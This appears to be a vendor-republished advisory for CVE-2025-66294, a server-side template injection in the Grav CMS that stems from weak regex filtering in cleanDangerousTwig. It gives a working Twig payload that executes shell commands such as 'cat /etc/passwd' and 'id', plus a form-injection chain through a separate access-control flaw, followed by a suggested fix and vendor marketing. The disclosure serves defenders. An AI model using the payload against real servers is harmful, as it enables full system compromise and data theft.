CVE-2025-66294

CVE-2025-66294 is a high-severity code injection vulnerability in getgrav/grav (composer), affecting versions < 1.8.0-beta.27. It is fixed in 1.8.0-beta.27.

Summary

A Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method.

Important

  • First of all this vulnerability is due to weak sanitization in the method clearDangerousTwig, so any other class that calls it indirectly through for example $twig->processString to sanitize code is also vulnerable.

  • For this report, we will need the official Form and Admin plugin installed, also I will be chaining this with another vulnerability to allow an editor which is a user with only pages permissions to edit the process section of a form.

  • I made another report for the other vulnerability which is a Broken Access Control which allows a user with full permission for pages to change the process section by intercepting the request and modifying it.

Permissions Needed

  • The main case for this vulnerability is an editor which can unconditionally takeover the whole system through creating a vulnerable form.
  • Second case is as an unauthenticated user, so if the form exists already and accepts user input and puts it through evaluate_twig, a guest can takeover the system.

Details

When we make a form with a process section and a message action, when the form is submitted we get to deal with onFormProcess in form.php through the message case:

            case 'message':
                $translated_string = $this->grav['language']->translate($params);
                $vars = array(
                    'form' => $form
                );

                /** @var Twig $twig */
                $twig = $this->grav['twig'];
                $processed_string = $twig->processString($translated_string, $vars);

                $form->message = $processed_string;
                break;

Which takes our parameters as in our action values, like in our case the value of our message action and sends it to processString which then calls the method cleanDangerousTwig from Security.php, now here's where we find the vulnerability is caused by two things:

  • First of all is weak regex which doesn't account for nested function calls, which allows us to bypass this function's sanitization
  • Second issue which is the evaluate and evaluate_twig functions which are allowed, and since we can call Twig syntax from inside them, it will lead to nested function calls which we can bypass and thus execute arbitrary payloads.
    public static function cleanDangerousTwig(string $string): string
    {
        if ($string === '') {
            return $string;
        }

        $bad_twig = [
            'twig_array_map',
            'twig_array_filter',
            'call_user_func',
            'registerUndefinedFunctionCallback',
            'undefined_functions',
            'twig.getFunction',
            'core.setEscaper',
            'twig.safe_functions',
            'read_file',
        ];
         
        // This allows for a payload like {{ evaluate("read_file('/etc/passwd')") }}
        $string = preg_replace('/(({{\s*|{%\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\s*}}|\s*%}))/i', '{# $1 #}', $string);
        return $string;
    }

PoC

First to showcase how the function handles the payload, I built a small php program that replicates the behavior of cleanDangerousTwig:

<?php

function cleanDangerousTwig(string $string): string
{
    if ($string === '') {
        return $string;
    }

    $bad_twig = [
        'twig_array_map',
        'twig_array_filter',
        'call_user_func',
        'registerUndefinedFunctionCallback',
        'undefined_functions',
        'twig.getFunction',
        'core.setEscaper',
        'twig.safe_functions',
        'read_file',
    ];
    $string = preg_replace('/(({{\s*|{%\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\s*}}|\s*%}))/i', '{# $1 #}', $string);

    return $string;
}

$x = $argv[1];
echo cleanDangerousTwig("evaluate_twig('$x')");

We can run the program with this payload:

php ok.php "{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('cat /etc/passwd') }}"

Our payload goes through and not one malicious function is filtered:

evaluate_twig('{# {{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} #} {# {% set a = grav.config.set('system.twig.undefined_functions',false) %} #} {# {{ grav.twig.twig.getFunction('cat /etc/passwd') }} #}')

Now we know that our payload definitely works so let's try it through a custom form this time, as an editor:

  • Go to pages
  • Add a page and create a new form or choose an exiting one

We will be using another vulnerability I found which is a Broken Access Control vulnerability, which allows an editor with basically only pages rights to modify a form's action sections without being in expert mode ( please refer to it's report ), so when we go to our form and save it, we can intercept the request and inject the following payload into data[_json][header][form] which is the header for our form which we shouldn't normally be able to modify:

{"name":"ssti-test 2","fields":{"name":{"type":"text","label":"Name","required":true}},"buttons":{"submit":{"type":"submit","value":"Submit"}},"process":[]}

URL-encode it before sending it should look something like this:

Request sent and processed! Now when you go to our form file you can see added a process section with the value of message changed:

Content of form:

title: Home
process:
    markdown: true
    twig: true
form:
    name: test
    fields:
        name:
            type: text
            label: Name
            required: true
    buttons:
        submit:
            type: submit
            value: submit
    process:
        -
            message: '{{ evaluate_twig(form.value(''name'')) }}'

Now in the process section, notice our message action is gonna take value from the Name input, using the following payload we will execute the command id on the system:

{{ grav.twig.twig.registerUndefinedFunctionCallback('system') }} {% set a = grav.config.set('system.twig.undefined_functions',false) %} {{ grav.twig.twig.getFunction('id') }}

Now we can visit the page and input our payload, submit and we got command result:

Impact

Allows an attacker to execute arbitrary commands, leading to full system compromise, including unauthorized access, data theft, privilege escalation, and disruption of services.

Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.

Affected versions

getgrav/grav (< 1.8.0-beta.27)

Security releases

getgrav/grav → 1.8.0-beta.27 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

  • Blacklist both the evaluate and evaluate_twig functions.
  • We could add second check to cleanDangerousTwig where we would look for each malicious function no matter it's position:
<?php

function cleanDangerousTwig(string $string): string
{
    if ($string === '') {
        return $string;
    }

    $bad_twig = [
        'twig_array_map',
        'twig_array_filter',
        'call_user_func',
        'registerUndefinedFunctionCallback',
        'undefined_functions',
        'twig.getFunction',
        'core.setEscaper',
        'twig.safe_functions',
        'read_file',
    ];
    $string = preg_replace('/(({{\s*|{%\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\s*}}|\s*%}))/i', '{# $1 #}', $string);

    foreach ($bad_twig as $func) {
        $string = preg_replace('/\b' . preg_quote($func, '/') . '(\s*\([^)]*\))?\b/i', '{# $1 #}', $string);
    }

    return $string;
}

$x = $argv[1];
echo cleanDangerousTwig("evaluate_twig('$x')");

When we run this, the result is:

evaluate_twig('{# {{ grav.twig.twig.{#  #}('system') }} #} {# {% set a = grav.config.set('system.twig.{#  #}',false) %} #} {# {{ grav.twig.{#  #}('cat /etc/passwd') }} #}')

You can see we managed to stop the payload and filter out the malicious functions.

Frequently Asked Questions

  1. What is CVE-2025-66294? CVE-2025-66294 is a high-severity code injection vulnerability in getgrav/grav (composer), affecting versions < 1.8.0-beta.27. It is fixed in 1.8.0-beta.27. Untrusted input is evaluated as executable code within the application's runtime environment.
  2. Which versions of getgrav/grav are affected by CVE-2025-66294? getgrav/grav (composer) versions < 1.8.0-beta.27 is affected.
  3. Is there a fix for CVE-2025-66294? Yes. CVE-2025-66294 is fixed in 1.8.0-beta.27. Upgrade to this version or later.
  4. Is CVE-2025-66294 exploitable, and should I be worried? Whether CVE-2025-66294 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2025-66294 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2025-66294? Upgrade getgrav/grav to 1.8.0-beta.27 or later.

Other vulnerabilities in getgrav/grav

CVE-2026-55890CVE-2026-55885CVE-2026-44738CVE-2026-44737CVE-2026-42844

Stop the waste.
Protect your environment with Kodem.